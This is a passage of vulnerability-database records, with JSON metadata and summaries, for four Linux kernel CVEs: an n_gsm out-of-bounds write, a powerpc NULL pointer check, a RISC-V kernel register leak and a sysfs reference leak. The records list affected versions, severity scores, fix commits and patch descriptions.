"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: n_gsm: fix possible out-of-bounds in gsm0_receive()\n\nAssuming the following:\n- side A configures the n_gsm in basic option mode\n- side B sends the header of a basic option mode frame with data length 1\n- side A switches to advanced option mode\n- side B sends 2 data bytes which exceeds gsm-\u003elen\n Reason: gsm-\u003elen is not used in advanced option mode.\n- side A switches to basic option mode\n- side B keeps sending until gsm0_receive() writes past gsm-\u003ebuf\n Reason: Neither gsm-\u003estate nor gsm-\u003elen have been reset after\n reconfiguration.\n\nFix this by changing gsm-\u003ecount to gsm-\u003elen comparison from equal to less\nthan. Also add upper limit checks against the constant MAX_MRU in\ngsm0_receive() and gsm1_receive() to harden against memory corruption of\ngsm-\u003elen and gsm-\u003emru.\n\nAll other checks remain as we still need to limit the data according to the\nuser configuration and actual payload size."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:38.690Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9513d4148950b05bc99fa7314dc883cc0e1605e5"
},
{
"url": "https://git.kernel.org/stable/c/b229bc6c6ea9fe459fc3fa94fd0a27a2f32aca56"
},
{
"url": "https://git.kernel.org/stable/c/0fb736c9931e02dbc7d9a75044c8e1c039e50f04"
},
{
"url": "https://git.kernel.org/stable/c/4c267110fc110390704cc065edb9817fdd10ff54"
},
{
"url": "https://git.kernel.org/stable/c/46f52c89a7e7d2691b97a9728e4591d071ca8abc"
},
{
"url": "https://git.kernel.org/stable/c/774d83b008eccb1c48c14dc5486e7aa255731350"
},
{
"url": "https://git.kernel.org/stable/c/f126ce7305fe88f49cdabc6db4168b9318898ea3"
},
{
"url": "https://git.kernel.org/stable/c/b890d45aaf02b564e6cae2d2a590f9649330857d"
},
{
"url": "https://git.kernel.org/stable/c/47388e807f85948eefc403a8a5fdc5b406a65d5a"
}
],
"title": "tty: n_gsm: fix possible out-of-bounds in gsm0_receive()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36016",
"datePublished": "2024-05-29T18:46:34.778Z",
"dateReserved": "2024-05-17T13:50:33.154Z",
"dateUpdated": "2025-11-04T17:20:57.711Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52696 (GCVE-0-2023-52696)
Vulnerability from cvelistv5
Published
2024-05-17 14:27
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/powernv: Add a null pointer check in opal_powercap_init()
kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b9ef7b4b867f56114bedbe6bf104cfaba0ca818e Version: b9ef7b4b867f56114bedbe6bf104cfaba0ca818e Version: b9ef7b4b867f56114bedbe6bf104cfaba0ca818e Version: b9ef7b4b867f56114bedbe6bf104cfaba0ca818e Version: b9ef7b4b867f56114bedbe6bf104cfaba0ca818e Version: b9ef7b4b867f56114bedbe6bf104cfaba0ca818e Version: b9ef7b4b867f56114bedbe6bf104cfaba0ca818e |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "e123015c0ba8",
"status": "affected",
"version": "b9ef7b4b867f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "9da4a56dd377",
"status": "affected",
"version": "b9ef7b4b867f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "a67a04ad05ac",
"status": "affected",
"version": "b9ef7b4b867f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6b58d1603721",
"status": "affected",
"version": "b9ef7b4b867f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "f152a6bfd187",
"status": "affected",
"version": "b9ef7b4b867f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "69f95c5e9220",
"status": "affected",
"version": "b9ef7b4b867f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b02ecc35d01a",
"status": "affected",
"version": "b9ef7b4b867f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.5",
"status": "unaffected",
"version": "5.4.268",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.209",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.148",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.75",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "6.6.14",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.8",
"status": "unaffected",
"version": "6.7.2",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.8"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.2.0:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.2.0"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52696",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-16T21:19:43.951324Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:20:15.174Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.585Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9da4a56dd3772570512ca58aa8832b052ae910dc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a67a04ad05acb56640798625e73fa54d6d41cce1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b58d16037217d0c64a2a09b655f370403ec7219"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f152a6bfd187f67afeffc9fd68cbe46f51439be0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69f95c5e9220f77ce7c540686b056c2b49e9a664"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b02ecc35d01a76b4235e008d2dd292895b28ecab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e123015c0ba859cf48aa7f89c5016cc6e98e018d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/powernv/opal-powercap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9da4a56dd3772570512ca58aa8832b052ae910dc",
"status": "affected",
"version": "b9ef7b4b867f56114bedbe6bf104cfaba0ca818e",
"versionType": "git"
},
{
"lessThan": "a67a04ad05acb56640798625e73fa54d6d41cce1",
"status": "affected",
"version": "b9ef7b4b867f56114bedbe6bf104cfaba0ca818e",
"versionType": "git"
},
{
"lessThan": "6b58d16037217d0c64a2a09b655f370403ec7219",
"status": "affected",
"version": "b9ef7b4b867f56114bedbe6bf104cfaba0ca818e",
"versionType": "git"
},
{
"lessThan": "f152a6bfd187f67afeffc9fd68cbe46f51439be0",
"status": "affected",
"version": "b9ef7b4b867f56114bedbe6bf104cfaba0ca818e",
"versionType": "git"
},
{
"lessThan": "69f95c5e9220f77ce7c540686b056c2b49e9a664",
"status": "affected",
"version": "b9ef7b4b867f56114bedbe6bf104cfaba0ca818e",
"versionType": "git"
},
{
"lessThan": "b02ecc35d01a76b4235e008d2dd292895b28ecab",
"status": "affected",
"version": "b9ef7b4b867f56114bedbe6bf104cfaba0ca818e",
"versionType": "git"
},
{
"lessThan": "e123015c0ba859cf48aa7f89c5016cc6e98e018d",
"status": "affected",
"version": "b9ef7b4b867f56114bedbe6bf104cfaba0ca818e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/powernv/opal-powercap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/powernv: Add a null pointer check in opal_powercap_init()\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:49.530Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9da4a56dd3772570512ca58aa8832b052ae910dc"
},
{
"url": "https://git.kernel.org/stable/c/a67a04ad05acb56640798625e73fa54d6d41cce1"
},
{
"url": "https://git.kernel.org/stable/c/6b58d16037217d0c64a2a09b655f370403ec7219"
},
{
"url": "https://git.kernel.org/stable/c/f152a6bfd187f67afeffc9fd68cbe46f51439be0"
},
{
"url": "https://git.kernel.org/stable/c/69f95c5e9220f77ce7c540686b056c2b49e9a664"
},
{
"url": "https://git.kernel.org/stable/c/b02ecc35d01a76b4235e008d2dd292895b28ecab"
},
{
"url": "https://git.kernel.org/stable/c/e123015c0ba859cf48aa7f89c5016cc6e98e018d"
}
],
"title": "powerpc/powernv: Add a null pointer check in opal_powercap_init()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52696",
"datePublished": "2024-05-17T14:27:28.583Z",
"dateReserved": "2024-03-07T14:49:46.889Z",
"dateUpdated": "2025-05-04T07:41:49.530Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35871 (GCVE-0-2024-35871)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
riscv: process: Fix kernel gp leakage
childregs represents the registers which are active for the new thread
in user context. For a kernel thread, childregs->gp is never used since
the kernel gp is not touched by switch_to. For a user mode helper, the
gp value can be observed in user space after execve or possibly by other
means.
[From the email thread]
The /* Kernel thread */ comment is somewhat inaccurate in that it is also used
for user_mode_helper threads, which exec a user process, e.g. /sbin/init or
when /proc/sys/kernel/core_pattern is a pipe. Such threads do not have
PF_KTHREAD set and are valid targets for ptrace etc. even before they exec.
childregs is the *user* context during syscall execution and it is observable
from userspace in at least five ways:
1. kernel_execve does not currently clear integer registers, so the starting
register state for PID 1 and other user processes started by the kernel has
sp = user stack, gp = kernel __global_pointer$, all other integer registers
zeroed by the memset in the patch comment.
This is a bug in its own right, but I'm unwilling to bet that it is the only
way to exploit the issue addressed by this patch.
2. ptrace(PTRACE_GETREGSET): you can PTRACE_ATTACH to a user_mode_helper thread
before it execs, but ptrace requires SIGSTOP to be delivered which can only
happen at user/kernel boundaries.
3. /proc/*/task/*/syscall: this is perfectly happy to read pt_regs for
user_mode_helpers before the exec completes, but gp is not one of the
registers it returns.
4. PERF_SAMPLE_REGS_USER: LOCKDOWN_PERF normally prevents access to kernel
addresses via PERF_SAMPLE_REGS_INTR, but due to this bug kernel addresses
are also exposed via PERF_SAMPLE_REGS_USER which is permitted under
LOCKDOWN_PERF. I have not attempted to write exploit code.
5. Much of the tracing infrastructure allows access to user registers. I have
not attempted to determine which forms of tracing allow access to user
registers without already allowing access to kernel registers.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7db91e57a0acde126a162ababfb1e0ab190130cb Version: 7db91e57a0acde126a162ababfb1e0ab190130cb Version: 7db91e57a0acde126a162ababfb1e0ab190130cb Version: 7db91e57a0acde126a162ababfb1e0ab190130cb Version: 7db91e57a0acde126a162ababfb1e0ab190130cb Version: 7db91e57a0acde126a162ababfb1e0ab190130cb |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35871",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:38:51.778237Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:41:55.174Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.064Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9abc3e6f1116adb7a2d4fbb8ce20c37916976bf5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dff6072124f6df77bfd36951fbd88565746980ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6583444d7e78dae750798552b65a2519ff3ca84"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00effef72c98294edb1efa87ffa0f6cfb61b36a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8dcba0691b8e42bddb61aab201e4d918a08e5d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d14fa1fcf69db9d070e75f1c4425211fa619dfc8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/riscv/kernel/process.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9abc3e6f1116adb7a2d4fbb8ce20c37916976bf5",
"status": "affected",
"version": "7db91e57a0acde126a162ababfb1e0ab190130cb",
"versionType": "git"
},
{
"lessThan": "dff6072124f6df77bfd36951fbd88565746980ef",
"status": "affected",
"version": "7db91e57a0acde126a162ababfb1e0ab190130cb",
"versionType": "git"
},
{
"lessThan": "f6583444d7e78dae750798552b65a2519ff3ca84",
"status": "affected",
"version": "7db91e57a0acde126a162ababfb1e0ab190130cb",
"versionType": "git"
},
{
"lessThan": "00effef72c98294edb1efa87ffa0f6cfb61b36a4",
"status": "affected",
"version": "7db91e57a0acde126a162ababfb1e0ab190130cb",
"versionType": "git"
},
{
"lessThan": "d8dcba0691b8e42bddb61aab201e4d918a08e5d9",
"status": "affected",
"version": "7db91e57a0acde126a162ababfb1e0ab190130cb",
"versionType": "git"
},
{
"lessThan": "d14fa1fcf69db9d070e75f1c4425211fa619dfc8",
"status": "affected",
"version": "7db91e57a0acde126a162ababfb1e0ab190130cb",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/riscv/kernel/process.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: process: Fix kernel gp leakage\n\nchildregs represents the registers which are active for the new thread\nin user context. For a kernel thread, childregs-\u003egp is never used since\nthe kernel gp is not touched by switch_to. For a user mode helper, the\ngp value can be observed in user space after execve or possibly by other\nmeans.\n\n[From the email thread]\n\nThe /* Kernel thread */ comment is somewhat inaccurate in that it is also used\nfor user_mode_helper threads, which exec a user process, e.g. /sbin/init or\nwhen /proc/sys/kernel/core_pattern is a pipe. Such threads do not have\nPF_KTHREAD set and are valid targets for ptrace etc. even before they exec.\n\nchildregs is the *user* context during syscall execution and it is observable\nfrom userspace in at least five ways:\n\n1. kernel_execve does not currently clear integer registers, so the starting\n register state for PID 1 and other user processes started by the kernel has\n sp = user stack, gp = kernel __global_pointer$, all other integer registers\n zeroed by the memset in the patch comment.\n\n This is a bug in its own right, but I\u0027m unwilling to bet that it is the only\n way to exploit the issue addressed by this patch.\n\n2. ptrace(PTRACE_GETREGSET): you can PTRACE_ATTACH to a user_mode_helper thread\n before it execs, but ptrace requires SIGSTOP to be delivered which can only\n happen at user/kernel boundaries.\n\n3. /proc/*/task/*/syscall: this is perfectly happy to read pt_regs for\n user_mode_helpers before the exec completes, but gp is not one of the\n registers it returns.\n\n4. PERF_SAMPLE_REGS_USER: LOCKDOWN_PERF normally prevents access to kernel\n addresses via PERF_SAMPLE_REGS_INTR, but due to this bug kernel addresses\n are also exposed via PERF_SAMPLE_REGS_USER which is permitted under\n LOCKDOWN_PERF. I have not attempted to write exploit code.\n\n5. Much of the tracing infrastructure allows access to user registers. I have\n not attempted to determine which forms of tracing allow access to user\n registers without already allowing access to kernel registers."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:18.449Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9abc3e6f1116adb7a2d4fbb8ce20c37916976bf5"
},
{
"url": "https://git.kernel.org/stable/c/dff6072124f6df77bfd36951fbd88565746980ef"
},
{
"url": "https://git.kernel.org/stable/c/f6583444d7e78dae750798552b65a2519ff3ca84"
},
{
"url": "https://git.kernel.org/stable/c/00effef72c98294edb1efa87ffa0f6cfb61b36a4"
},
{
"url": "https://git.kernel.org/stable/c/d8dcba0691b8e42bddb61aab201e4d918a08e5d9"
},
{
"url": "https://git.kernel.org/stable/c/d14fa1fcf69db9d070e75f1c4425211fa619dfc8"
}
],
"title": "riscv: process: Fix kernel gp leakage",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35871",
"datePublished": "2024-05-19T08:34:29.292Z",
"dateReserved": "2024-05-17T13:50:33.108Z",
"dateUpdated": "2025-05-04T09:07:18.449Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26993 (GCVE-0-2024-26993)
Vulnerability from cvelistv5
Published
2024-05-01 05:28
Modified
2025-11-04 17:15
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fs: sysfs: Fix reference leak in sysfs_break_active_protection()
The sysfs_break_active_protection() routine has an obvious reference
leak in its error path. If the call to kernfs_find_and_get() fails then
kn will be NULL, so the companion sysfs_unbreak_active_protection()
routine won't get called (and would only cause an access violation by
trying to dereference kn->parent if it was called). As a result, the
reference to kobj acquired at the start of the function will never be
released.
Fix the leak by adding an explicit kobject_put() call when kn is NULL.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
